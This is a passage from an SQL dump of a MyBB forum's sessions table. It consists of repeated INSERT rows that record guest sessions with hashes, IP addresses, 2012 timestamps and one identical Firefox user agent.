('8e6734d8a1e4f44ed2b561dd81d50586', '0', '67.121.108.30', '1352772492', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f4cfa19af284e6e56e99407788ef9084', '0', '112.130.6.2', '1352772493', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('99f37d88e92ec551e1f75183337110f8', '0', '161.104.56.168', '1352772493', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9df3f312b839e5985cdc9f9446e00c10', '0', '138.14.134.173', '1352772494', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9657ba5947ea7aa47b50c24de9e50d29', '0', '99.177.11.8', '1352772495', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb78a9cea858719d60c544a2dad44f84', '0', '38.86.220.223', '1352772495', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e0371b878c6d9685c9ebe352a0de1b87', '0', '58.219.32.82', '1352772496', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2d7dc11864a088e46b5aa9ed2183a000', '0', '38.200.126.152', '1352772497', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c0d133ded0b49607642128ee86b7907', '0', '25.64.38.75', '1352772498', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3662bfc7bdb9d0e32a8ffb0cf4318983', '0', '242.47.147.79', '1352772500', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4730f90bce894bc21cf25e71eb680c86', '0', '126.30.71.116', '1352772500', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74c36f2c4a3b6548ed7f62d378091531', '0', '205.98.79.86', '1352772501', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d3eb71433bb791b043dc3d73dc9eca96', '0', '75.110.116.236', '1352772501', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a0d754c4873a63f043f20896dd105b8e', '0', '138.99.8.241', '1352772502', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4fefd63675d84c8e382fe3b18b9e91b5', '0', '111.40.115.66', '1352772503', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee8f3319c1d1b08163c56c21b21a01a5', '0', '88.26.124.75', '1352772504', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('86251635b97a620d9727b461b548e72d', '0', '237.138.48.51', '1352772504', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('92b57b76b39046ea17851f0dc8e11db4', '0', '41.1.238.186', '1352772505', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aa688700ea0801a36b3ba0629cd1f1ad', '0', '237.148.98.203', '1352772506', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d91605ab4fd2a5f349bfcf61dbd186b4', '0', '146.183.146.44', '1352772506', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a0a8bb896cf57cbc8e4e7c54fe790438', '0', '18.60.211.48', '1352772507', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('701b72e17ac7ecb660a6f79650c13372', '0', '154.178.144.170', '1352772508', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0f0981a1c28d6102cd43b92e7dbfd570', '0', '214.113.133.176', '1352772509', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('43209ae81ea0c6ee1fa9d717cde57b55', '0', '21.7.167.245', '1352772509', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('411c31a1364857d6ffad4962230417ea', '0', '39.234.248.204', '1352772510', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f0fa7849ae0cfc0d2790579499efce7d', '0', '67.167.146.54', '1352772511', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b397b2dbecc5ef6eea6d40e6199b05a', '0', '106.239.240.178', '1352772511', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bfb6cc3fef7757f924d8f908cb00e515', '0', '247.123.124.129', '1352772512', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('06ef9d52f5f7a174cd550e723782cf00', '0', '60.33.122.233', '1352772513', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('29b6b2805b876e426d88130a5218bf59', '0', '18.38.117.238', '1352772514', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1faf50f8baeedde9d2f3fee34b3c0e73', '0', '182.157.113.141', '1352772515', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0faf3a5c3012800013c8106121111c38', '0', '84.121.221.211', '1352772515', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d4c271be4f923d6e8567583dd9902fea', '0', '58.176.144.147', '1352772516', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fe73b54b0a8373bba7c6a198478987bc', '0', '11.185.223.86', '1352772517', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c4b07a111240b1da1748748de6d449ef', '0', '215.21.125.21', '1352772518', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5954437d6830a30100774449791bd5a6', '0', '112.82.4.129', '1352772518', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b306aa1c47c170a7432e4a894f4d99ca', '0', '131.146.125.123', '1352772519', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27cb384d082352aa251c5965e8cd2195', '0', '211.21.55.254', '1352772519', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2554d466919912bffa51dceaf1aa83e2', '0', '79.30.147.31', '1352772520', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74c5e5e077cc7b29168fdf5124eec21b', '0', '32.119.180.117', '1352772521', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dd0e5a8571ef781cd55362c9f104ff08', '0', '101.184.141.236', '1352772523', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('762955e16bcbf0a624c8559d61e90333', '0', '178.6.57.215', '1352772524', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('976e4c759ad657b8365bcc7c126e7251', '0', '12.22.214.60', '1352772524', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee7469f8fa7a9240460fc7c85cca68df', '0', '254.209.16.1', '1352772525', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('da1fffafc28faa7fb5d1fddb365bc358', '0', '81.65.65.120', '1352772526', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f64de0196c9a80391cebaaad7919d1fe', '0', '97.114.182.150', '1352772527', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3f6616952d841cb73b2c48c99c379d62', '0', '175.94.4.112', '1352772527', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1cb679226fe7315daa76ac446acb5d52', '0', '253.232.132.92', '1352772528', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('30522608bae1b3d9a7dc4a927ab24ac3', '0', '147.155.80.117', '1352772529', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4c0c5783023d408563892b7260b3e99f', '0', '150.13.117.221', '1352772529', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bd8cdfc22c180748688f3455b3a34a3b', '0', '29.64.74.237', '1352772530', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3b4d381a0aeb000a35e44c144a5ccf4f', '0', '186.53.6.217', '1352772530', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b1de4a4861931fcca0951806e2f7904', '0', '69.153.35.103', '1352772531', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e05f30c2ed18d29ff04f0e0b5c6b1936', '0', '54.163.166.120', '1352772532', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fc7f8690bc29a42e379614f43def7458', '0', '15.88.251.219', '1352772532', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('08179a76ef11c51110902bc5691d31f3', '0', '120.21.131.96', '1352772533', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7436af5c6095e722018b2b28b6d1fe72', '0', '192.125.44.219', '1352772534', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e3b882152ab7eeef3c76836aef8e22d4', '0', '99.211.253.207', '1352772535', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f8ed54fb61485d3edee353321f2e771a', '0', '251.183.199.9', '1352772535', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('401db83595fcc75ee59d3e82e3528c01', '0', '64.57.9.99', '1352772536', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a1c64cc5fed9a013efe3b9a6de272a0e', '0', '163.174.193.20', '1352772537', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('459709f6d14812b32b22831dc8bd0cb2', '0', '8.236.107.165', '1352772537', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3d8f133a8ed152f54103be1aa3b55c19', '0', '24.121.224.78', '1352772538', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('10ade7bb9d517d638cad085ebedf7b26', '0', '165.88.244.81', '1352772539', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('32807a76a00a00fb7feafa5a5bc08054', '0', '85.156.1.211', '1352772539', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d160c03c4989c1867a2243c3fbc2589', '0', '106.96.5.240', '1352772540', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7981f012b723aee4b6dd1de8a3fd25d0', '0', '32.92.96.51', '1352772541', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eff3d6988ebf049687c684385fad1b69', '0', '50.76.23.97', '1352772541', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e4ebcd2b7e999401af57f7f5210dc358', '0', '97.93.225.54', '1352772542', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('85ead62ad765042a4e27e055c127b13a', '0', '234.108.28.225', '1352772543', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ccf4f7e294826d03e96825ce9bdd05de', '0', '155.54.179.108', '1352772543', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4fb81653f552481f2cfb3a6e6048c812', '0', '1.146.157.234', '1352772544', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('88968821e9de09709a1ee9873ae9471e', '0', '45.252.209.48', '1352772545', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4bd1ff6e05740e2385d701a91e229822', '0', '180.70.249.175', '1352772545', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('abf04f59ee4e4c9f8b7f79ee49f670dc', '0', '5.194.113.56', '1352772547', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3b0d278189bf507e66718d5378122e2f', '0', '118.13.64.61', '1352772548', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ac34ca424e48ca32fc2f4a8e5244b51', '0', '152.73.109.197', '1352772548', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8bde5ea9e6c42814ed713d137e9da280', '0', '181.43.46.42', '1352772549', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f3dafa28e35d5bc28f3bb36e74c6cb04', '0', '164.199.44.19', '1352772549', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4395860b6e46f3c69f3a137c53e98d34', '0', '89.100.38.155', '1352772550', '/index.php?', 